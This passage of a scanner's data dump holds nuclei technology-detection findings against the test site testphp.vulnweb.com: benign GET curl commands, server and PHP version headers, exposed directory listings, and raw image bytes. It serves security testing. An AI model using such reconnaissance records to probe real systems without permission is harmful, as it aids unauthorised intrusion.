��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 266, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4868.99 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:34:58.468Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4868.99 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:51 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 267, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:34:58.563Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 268, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:34:58.656Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 269, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:34:58.754Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:52 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 270, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:34:58.839Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:54 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 271, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:34:58.927Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:54 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 